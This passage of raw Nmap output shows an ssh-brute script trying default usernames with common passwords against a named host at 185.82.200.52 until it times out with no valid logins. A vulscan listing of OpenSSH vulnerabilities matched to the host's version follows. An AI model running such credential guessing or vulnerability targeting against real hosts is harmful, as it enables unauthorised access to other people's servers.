3312NSE: [ssh-brute] Trying username/password pair: webadmin:yellow
3313NSE: [ssh-brute] Trying username/password pair: sysadmin:yellow
3314NSE: [ssh-brute] Trying username/password pair: netadmin:yellow
3315NSE: [ssh-brute] Trying username/password pair: guest:yellow
3316NSE: [ssh-brute] Trying username/password pair: user:yellow
3317NSE: [ssh-brute] Trying username/password pair: web:yellow
3318NSE: [ssh-brute] Trying username/password pair: test:yellow
3319NSE: [ssh-brute] Trying username/password pair: root:lauren
3320NSE: [ssh-brute] Trying username/password pair: admin:lauren
3321NSE: [ssh-brute] Trying username/password pair: administrator:lauren
3322NSE: [ssh-brute] Trying username/password pair: webadmin:lauren
3323NSE: [ssh-brute] Trying username/password pair: sysadmin:lauren
3324NSE: [ssh-brute] Trying username/password pair: netadmin:lauren
3325NSE: [ssh-brute] Trying username/password pair: guest:lauren
3326NSE: [ssh-brute] Trying username/password pair: user:lauren
3327NSE: [ssh-brute] Trying username/password pair: web:lauren
3328NSE: [ssh-brute] Trying username/password pair: test:lauren
3329NSE: [ssh-brute] Trying username/password pair: root:daniela
3330NSE: [ssh-brute] Trying username/password pair: admin:daniela
3331NSE: [ssh-brute] Trying username/password pair: administrator:daniela
3332NSE: [ssh-brute] Trying username/password pair: webadmin:daniela
3333NSE: [ssh-brute] Trying username/password pair: sysadmin:daniela
3334NSE: [ssh-brute] Trying username/password pair: netadmin:daniela
3335NSE: [ssh-brute] Trying username/password pair: guest:daniela
3336NSE: [ssh-brute] Trying username/password pair: user:daniela
3337NSE: [ssh-brute] Trying username/password pair: web:daniela
3338NSE: [ssh-brute] Trying username/password pair: test:daniela
3339NSE: [ssh-brute] Trying username/password pair: root:princesa
3340NSE: [ssh-brute] Trying username/password pair: admin:princesa
3341NSE: [ssh-brute] Trying username/password pair: administrator:princesa
3342NSE: [ssh-brute] Trying username/password pair: webadmin:princesa
3343NSE: [ssh-brute] Trying username/password pair: sysadmin:princesa
3344NSE: [ssh-brute] Trying username/password pair: netadmin:princesa
3345NSE: [ssh-brute] Trying username/password pair: guest:princesa
3346NSE: [ssh-brute] Trying username/password pair: user:princesa
3347NSE: [ssh-brute] Trying username/password pair: web:princesa
3348NSE: [ssh-brute] Trying username/password pair: test:princesa
3349NSE: [ssh-brute] Trying username/password pair: root:william
3350NSE: [ssh-brute] Trying username/password pair: admin:william
3351NSE: [ssh-brute] Trying username/password pair: administrator:william
3352NSE: [ssh-brute] Trying username/password pair: webadmin:william
3353NSE: [ssh-brute] Trying username/password pair: sysadmin:william
3354NSE: [ssh-brute] Trying username/password pair: netadmin:william
3355NSE: [ssh-brute] Trying username/password pair: guest:william
3356NSE: [ssh-brute] Trying username/password pair: user:william
3357NSE: [ssh-brute] Trying username/password pair: web:william
3358NSE: [ssh-brute] Trying username/password pair: test:william
3359NSE: [ssh-brute] Trying username/password pair: root:alexandra
3360NSE: [ssh-brute] Trying username/password pair: admin:alexandra
3361NSE: [ssh-brute] Trying username/password pair: administrator:alexandra
3362NSE: [ssh-brute] Trying username/password pair: webadmin:alexandra
3363NSE: [ssh-brute] Trying username/password pair: sysadmin:alexandra
3364NSE: [ssh-brute] Trying username/password pair: netadmin:alexandra
3365NSE: [ssh-brute] Trying username/password pair: guest:alexandra
3366NSE: [ssh-brute] Trying username/password pair: user:alexandra
3367NSE: [ssh-brute] Trying username/password pair: web:alexandra
3368NSE: [ssh-brute] Trying username/password pair: test:alexandra
3369NSE: [ssh-brute] Trying username/password pair: root:thomas
3370NSE: [ssh-brute] Trying username/password pair: admin:thomas
3371NSE: [ssh-brute] Trying username/password pair: administrator:thomas
3372NSE: [ssh-brute] Trying username/password pair: webadmin:thomas
3373NSE: [ssh-brute] Trying username/password pair: sysadmin:thomas
3374NSE: [ssh-brute] Trying username/password pair: netadmin:thomas
3375NSE: [ssh-brute] Trying username/password pair: guest:thomas
3376NSE: [ssh-brute] Trying username/password pair: user:thomas
3377NSE: [ssh-brute] Trying username/password pair: web:thomas
3378NSE: [ssh-brute] Trying username/password pair: test:thomas
3379NSE: [ssh-brute] Trying username/password pair: root:jesus
3380NSE: [ssh-brute] Trying username/password pair: admin:jesus
3381NSE: [ssh-brute] Trying username/password pair: administrator:jesus
3382NSE: [ssh-brute] Trying username/password pair: webadmin:jesus
3383NSE: [ssh-brute] Trying username/password pair: sysadmin:jesus
3384NSE: [ssh-brute] Trying username/password pair: netadmin:jesus
3385NSE: [ssh-brute] Trying username/password pair: guest:jesus
3386NSE: [ssh-brute] Trying username/password pair: user:jesus
3387NSE: [ssh-brute] Trying username/password pair: web:jesus
3388NSE: [ssh-brute] Trying username/password pair: test:jesus
3389NSE: [ssh-brute] Trying username/password pair: root:alexis
3390NSE: [ssh-brute] Trying username/password pair: admin:alexis
3391NSE: [ssh-brute] Trying username/password pair: administrator:alexis
3392NSE: [ssh-brute] Trying username/password pair: webadmin:alexis
3393NSE: [ssh-brute] Trying username/password pair: sysadmin:alexis
3394NSE: [ssh-brute] Trying username/password pair: netadmin:alexis
3395NSE: [ssh-brute] Trying username/password pair: guest:alexis
3396NSE: [ssh-brute] Trying username/password pair: user:alexis
3397NSE: [ssh-brute] Trying username/password pair: web:alexis
3398NSE: [ssh-brute] Trying username/password pair: test:alexis
3399NSE: [ssh-brute] Trying username/password pair: root:miguel
3400NSE: [ssh-brute] Trying username/password pair: admin:miguel
3401NSE: [ssh-brute] Trying username/password pair: administrator:miguel
3402NSE: [ssh-brute] Trying username/password pair: webadmin:miguel
3403NSE: [ssh-brute] Trying username/password pair: sysadmin:miguel
3404NSE: [ssh-brute] Trying username/password pair: netadmin:miguel
3405NSE: [ssh-brute] Trying username/password pair: guest:miguel
3406NSE: [ssh-brute] Trying username/password pair: user:miguel
3407NSE: [ssh-brute] Trying username/password pair: web:miguel
3408NSE: [ssh-brute] Trying username/password pair: test:miguel
3409NSE: [ssh-brute] Trying username/password pair: root:estrella
3410NSE: [ssh-brute] Trying username/password pair: admin:estrella
3411NSE: [ssh-brute] Trying username/password pair: administrator:estrella
3412NSE: [ssh-brute] Trying username/password pair: webadmin:estrella
3413NSE: [ssh-brute] Trying username/password pair: sysadmin:estrella
3414NSE: [ssh-brute] Trying username/password pair: netadmin:estrella
3415NSE: [ssh-brute] Trying username/password pair: guest:estrella
3416NSE: [ssh-brute] Trying username/password pair: user:estrella
3417NSE: [ssh-brute] Trying username/password pair: web:estrella
3418NSE: [ssh-brute] Trying username/password pair: test:estrella
3419NSE: [ssh-brute] Trying username/password pair: root:patrick
3420NSE: [ssh-brute] Trying username/password pair: admin:patrick
3421NSE: [ssh-brute] Trying username/password pair: administrator:patrick
3422NSE: [ssh-brute] Trying username/password pair: webadmin:patrick
3423NSE: [ssh-brute] Trying username/password pair: sysadmin:patrick
3424NSE: [ssh-brute] Trying username/password pair: netadmin:patrick
3425NSE: [ssh-brute] Trying username/password pair: guest:patrick
3426NSE: [ssh-brute] Trying username/password pair: user:patrick
3427NSE: [ssh-brute] Trying username/password pair: web:patrick
3428NSE: [ssh-brute] Trying username/password pair: test:patrick
3429NSE: [ssh-brute] Trying username/password pair: root:angela
3430NSE: [ssh-brute] Trying username/password pair: admin:angela
3431NSE: [ssh-brute] Trying username/password pair: administrator:angela
3432NSE: [ssh-brute] Trying username/password pair: webadmin:angela
3433NSE: [ssh-brute] Trying username/password pair: sysadmin:angela
3434NSE: [ssh-brute] Trying username/password pair: netadmin:angela
3435NSE: [ssh-brute] Trying username/password pair: guest:angela
3436NSE: [ssh-brute] Trying username/password pair: user:angela
3437NSE: [ssh-brute] Trying username/password pair: web:angela
3438NSE: [ssh-brute] Trying username/password pair: test:angela
3439NSE: [ssh-brute] Trying username/password pair: root:mylove
3440NSE: [ssh-brute] Trying username/password pair: admin:mylove
3441NSE: [ssh-brute] Trying username/password pair: administrator:mylove
3442NSE: [ssh-brute] Trying username/password pair: webadmin:mylove
3443NSE: [ssh-brute] Trying username/password pair: sysadmin:mylove
3444NSE: [ssh-brute] Trying username/password pair: netadmin:mylove
3445NSE: [ssh-brute] Trying username/password pair: guest:mylove
3446NSE: [ssh-brute] Trying username/password pair: user:mylove
3447NSE: [ssh-brute] Trying username/password pair: web:mylove
3448NSE: [ssh-brute] Trying username/password pair: test:mylove
3449NSE: [ssh-brute] Trying username/password pair: root:poohbear
3450NSE: [ssh-brute] Trying username/password pair: admin:poohbear
3451NSE: [ssh-brute] Trying username/password pair: administrator:poohbear
3452NSE: [ssh-brute] Trying username/password pair: webadmin:poohbear
3453NSE: [ssh-brute] Trying username/password pair: sysadmin:poohbear
3454NSE: [ssh-brute] Trying username/password pair: netadmin:poohbear
3455NSE: [ssh-brute] Trying username/password pair: guest:poohbear
3456NSE: [ssh-brute] Trying username/password pair: user:poohbear
3457NSE: [ssh-brute] Trying username/password pair: web:poohbear
3458NSE: [ssh-brute] Trying username/password pair: test:poohbear
3459NSE: [ssh-brute] Trying username/password pair: root:beautiful
3460NSE: [ssh-brute] Trying username/password pair: admin:beautiful
3461NSE: [ssh-brute] Trying username/password pair: administrator:beautiful
3462NSE: [ssh-brute] Trying username/password pair: webadmin:beautiful
3463NSE: [ssh-brute] Trying username/password pair: sysadmin:beautiful
3464NSE: [ssh-brute] Trying username/password pair: netadmin:beautiful
3465NSE: [ssh-brute] Trying username/password pair: guest:beautiful
3466NSE: [ssh-brute] Trying username/password pair: user:beautiful
3467NSE: [ssh-brute] Trying username/password pair: web:beautiful
3468NSE: [ssh-brute] Trying username/password pair: test:beautiful
3469NSE: [ssh-brute] Trying username/password pair: root:iloveme
3470NSE: [ssh-brute] Trying username/password pair: admin:iloveme
3471NSE: [ssh-brute] Trying username/password pair: administrator:iloveme
3472NSE: [ssh-brute] Trying username/password pair: webadmin:iloveme
3473NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveme
3474NSE: [ssh-brute] Trying username/password pair: netadmin:iloveme
3475NSE: [ssh-brute] Trying username/password pair: guest:iloveme
3476NSE: [ssh-brute] Trying username/password pair: user:iloveme
3477NSE: [ssh-brute] Trying username/password pair: web:iloveme
3478NSE: [ssh-brute] Trying username/password pair: test:iloveme
3479NSE: [ssh-brute] Trying username/password pair: root:sakura
3480NSE: [ssh-brute] Trying username/password pair: admin:sakura
3481NSE: [ssh-brute] Trying username/password pair: administrator:sakura
3482NSE: [ssh-brute] Trying username/password pair: webadmin:sakura
3483NSE: [ssh-brute] Trying username/password pair: sysadmin:sakura
3484NSE: [ssh-brute] Trying username/password pair: netadmin:sakura
3485NSE: [ssh-brute] Trying username/password pair: guest:sakura
3486NSE: [ssh-brute] Trying username/password pair: user:sakura
3487NSE: [ssh-brute] Trying username/password pair: web:sakura
3488NSE: [ssh-brute] Trying username/password pair: test:sakura
3489NSE: [ssh-brute] Trying username/password pair: root:adrian
3490NSE: [ssh-brute] Trying username/password pair: admin:adrian
3491NSE: [ssh-brute] Trying username/password pair: administrator:adrian
3492NSE: [ssh-brute] Trying username/password pair: webadmin:adrian
3493NSE: [ssh-brute] usernames: Time limit 10m00s exceeded.
3494NSE: [ssh-brute] usernames: Time limit 10m00s exceeded.
3495NSE: [ssh-brute] passwords: Time limit 10m00s exceeded.
3496Nmap scan report for latina.petite.guru (185.82.200.52)
3497Host is up (0.22s latency).
3498
3499PORT STATE SERVICE VERSION
350022/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
3501| ssh-auth-methods:
3502| Supported authentication methods:
3503| publickey
3504|_ password
3505| ssh-brute:
3506| Accounts: No valid accounts found
3507|_ Statistics: Performed 1154 guesses in 602 seconds, average tps: 1.7
3508| ssh-hostkey:
3509| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
3510| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
3511| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
3512|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
3513| ssh-publickey-acceptance:
3514|_ Accepted Public Keys: No public keys accepted
3515|_ssh-run: Failed to specify credentials and command to run.
3516| vulscan: VulDB - https://vuldb.com:
3517| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
3518| [76326] OpenSSH 6.8 XSECURITY privilege escalation
3519| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
3520| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
3521| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
3522| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
3523|
3524| MITRE CVE - https://cve.mitre.org:
3525| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
3526| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
3527| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
3528| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
3529| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
3530| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
3531|
3532| SecurityFocus - https://www.securityfocus.com/bid/:
3533| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
3534| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
3535| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
3536| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
3537| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
3538| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
3539| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
3540| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
3541| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
3542| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
3543| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
3544| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
3545| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
3546| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
3547| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
3548| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
3549| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
3550| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
3551| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
3552| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
3553| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
3554| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
3555| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
3556| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
3557| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
3558| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
3559| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
3560| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
3561| [75990] OpenSSH Login Handling Security Bypass Weakness
3562| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
3563| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
3564| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
3565| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
3566| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
3567| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
3568| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
3569| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
3570| [61286] OpenSSH Remote Denial of Service Vulnerability
3571| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
3572| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
3573| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
3574| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
3575| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
3576| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3577| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
3578| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
3579| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3580| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
3581| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
3582| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
3583| [30794] Red Hat OpenSSH Backdoor Vulnerability
3584| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
3585| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
3586| [28531] OpenSSH ForceCommand Command Execution Weakness
3587| [28444] OpenSSH X Connections Session Hijacking Vulnerability
3588| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
3589| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
3590| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
3591| [20956] OpenSSH Privilege Separation Key Signature Weakness
3592| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
3593| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
3594| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
3595| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
3596| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
3597| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
3598| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
3599| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
3600| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
3601| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
3602| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
3603| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
3604| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
3605| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
3606| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
3607| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
3608| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
3609| [6168] OpenSSH Visible Password Vulnerability
3610| [5374] OpenSSH Trojan Horse Vulnerability
3611| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
3612| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3613| [4241] OpenSSH Channel Code Off-By-One Vulnerability
3614| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
3615| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
3616| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
3617| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
3618| [2917] OpenSSH PAM Session Evasion Vulnerability
3619| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
3620| [2356] OpenSSH Private Key Authentication Check Vulnerability
3621| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
3622| [1334] OpenSSH UseLogin Vulnerability
3623|
3624| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3625| [83258] GSI-OpenSSH auth-pam.c security bypass
3626| [82781] OpenSSH time limit denial of service
3627| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
3628| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
3629| [72756] Debian openssh-server commands information disclosure
3630| [68339] OpenSSH pam_thread buffer overflow
3631| [67264] OpenSSH ssh-keysign unauthorized access
3632| [65910] OpenSSH remote_glob function denial of service
3633| [65163] OpenSSH certificate information disclosure
3634| [64387] OpenSSH J-PAKE security bypass
3635| [63337] Cisco Unified Videoconferencing OpenSSH weak security
3636| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
3637| [45202] OpenSSH signal handler denial of service
3638| [44747] RHEL OpenSSH backdoor
3639| [44280] OpenSSH PermitRootLogin information disclosure
3640| [44279] OpenSSH sshd weak security
3641| [44037] OpenSSH sshd SELinux role unauthorized access
3642| [43940] OpenSSH X11 forwarding information disclosure
3643| [41549] OpenSSH ForceCommand directive security bypass
3644| [41438] OpenSSH sshd session hijacking
3645| [40897] OpenSSH known_hosts weak security
3646| [40587] OpenSSH username weak security
3647| [37371] OpenSSH username data manipulation
3648| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
3649| [37112] RHSA update for OpenSSH signal handler race condition not installed
3650| [37107] RHSA update for OpenSSH identical block denial of service not installed
3651| [36637] OpenSSH X11 cookie privilege escalation
3652| [35167] OpenSSH packet.c newkeys[mode] denial of service
3653| [34490] OpenSSH OPIE information disclosure
3654| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
3655| [32975] Apple Mac OS X OpenSSH denial of service
3656| [32387] RHSA-2006:0738 updates for openssh not installed
3657| [32359] RHSA-2006:0697 updates for openssh not installed
3658| [32230] RHSA-2006:0298 updates for openssh not installed
3659| [32132] RHSA-2006:0044 updates for openssh not installed
3660| [30120] OpenSSH privilege separation monitor authentication verification weakness
3661| [29255] OpenSSH GSSAPI user enumeration
3662| [29254] OpenSSH signal handler race condition
3663| [29158] OpenSSH identical block denial of service
3664| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
3665| [25116] OpenSSH OpenPAM denial of service
3666| [24305] OpenSSH SCP shell expansion command execution
3667| [22665] RHSA-2005:106 updates for openssh not installed
3668| [22117] OpenSSH GSSAPI allows elevated privileges
3669| [22115] OpenSSH GatewayPorts security bypass
3670| [20930] OpenSSH sshd.c LoginGraceTime denial of service
3671| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
3672| [17213] OpenSSH allows port bouncing attacks
3673| [16323] OpenSSH scp file overwrite
3674| [13797] OpenSSH PAM information leak
3675| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
3676| [13264] OpenSSH PAM code could allow an attacker to gain access
3677| [13215] OpenSSH buffer management errors could allow an attacker to execute code
3678| [13214] OpenSSH memory vulnerabilities
3679| [13191] OpenSSH large packet buffer overflow
3680| [12196] OpenSSH could allow an attacker to bypass login restrictions
3681| [11970] OpenSSH could allow an attacker to obtain valid administrative account
3682| [11902] OpenSSH PAM support enabled information leak
3683| [9803] OpenSSH "
3684| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
3685| [9307] OpenSSH is running on the system
3686| [9169] OpenSSH "
3687| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
3688| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
3689| [8383] OpenSSH off-by-one error in channel code
3690| [7647] OpenSSH UseLogin option arbitrary code execution
3691| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
3692| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
3693| [7179] OpenSSH source IP access control bypass
3694| [6757] OpenSSH "
3695| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
3696| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
3697| [5517] OpenSSH allows unauthorized access to resources
3698| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
3699|
3700| Exploit-DB - https://www.exploit-db.com:
3701| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
3702|
3703| OpenVAS (Nessus) - http://www.openvas.org:
3704| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
3705| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
3706| [881183] CentOS Update for openssh CESA-2012:0884 centos6
3707| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
3708| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
3709| [870763] RedHat Update for openssh RHSA-2012:0884-04
3710| [870129] RedHat Update for openssh RHSA-2008:0855-01
3711| [861813] Fedora Update for openssh FEDORA-2010-5429
3712| [861319] Fedora Update for openssh FEDORA-2007-395
3713| [861170] Fedora Update for openssh FEDORA-2007-394
3714| [861012] Fedora Update for openssh FEDORA-2007-715
3715| [840345] Ubuntu Update for openssh vulnerability USN-597-1
3716| [840300] Ubuntu Update for openssh update USN-612-5
3717| [840271] Ubuntu Update for openssh vulnerability USN-612-2
3718| [840268] Ubuntu Update for openssh update USN-612-7
3719| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
3720| [840214] Ubuntu Update for openssh vulnerability USN-566-1
3721| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
3722| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
3723| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
3724| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
3725| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
3726| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
3727| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
3728| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
3729| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
3730| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3731| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3732| [100584] OpenSSH X Connections Session Hijacking Vulnerability
3733| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
3734| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
3735| [65987] SLES10: Security update for OpenSSH
3736| [65819] SLES10: Security update for OpenSSH
3737| [65514] SLES9: Security update for OpenSSH
3738| [65513] SLES9: Security update for OpenSSH
3739| [65334] SLES9: Security update for OpenSSH
3740| [65248] SLES9: Security update for OpenSSH
3741| [65218] SLES9: Security update for OpenSSH
3742| [65169] SLES9: Security update for openssh,openssh-askpass
3743| [65126] SLES9: Security update for OpenSSH
3744| [65019] SLES9: Security update for OpenSSH
3745| [65015] SLES9: Security update for OpenSSH
3746| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
3747| [61639] Debian Security Advisory DSA 1638-1 (openssh)
3748| [61030] Debian Security Advisory DSA 1576-2 (openssh)
3749| [61029] Debian Security Advisory DSA 1576-1 (openssh)
3750| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
3751| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
3752| [60667] Slackware Advisory SSA:2008-095-01 openssh
3753| [59014] Slackware Advisory SSA:2007-255-01 openssh
3754| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
3755| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
3756| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
3757| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
3758| [57492] Slackware Advisory SSA:2006-272-02 openssh
3759| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
3760| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
3761| [57470] FreeBSD Ports: openssh
3762| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
3763| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
3764| [56294] Slackware Advisory SSA:2006-045-06 openssh
3765| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
3766| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
3767| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
3768| [53788] Debian Security Advisory DSA 025-1 (openssh)
3769| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
3770| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
3771| [11343] OpenSSH Client Unauthorized Remote Forwarding
3772| [10954] OpenSSH AFS/Kerberos ticket/token passing
3773| [10883] OpenSSH Channel Code Off by 1
